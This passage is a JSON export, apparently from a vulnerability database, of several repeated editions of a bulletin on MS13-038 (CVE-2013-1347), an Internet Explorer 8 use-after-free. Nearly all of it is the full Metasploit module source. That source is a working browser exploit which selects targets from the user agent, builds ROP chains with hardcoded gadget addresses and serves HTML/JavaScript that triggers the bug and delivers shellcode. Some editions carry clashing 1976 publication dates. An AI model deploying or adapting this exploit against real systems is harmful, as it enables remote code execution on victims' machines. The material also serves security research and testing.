SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-25T16:58:04", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-25T20:58:06", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-25T20:58:06"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-25T20:58:06", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-08T09:01:05", "history": [], "viewCount": 66, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-08T09:01:05"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-08T09:01:05", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-08T10:55:15", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-08T10:55:15"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-08T10:55:15", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": 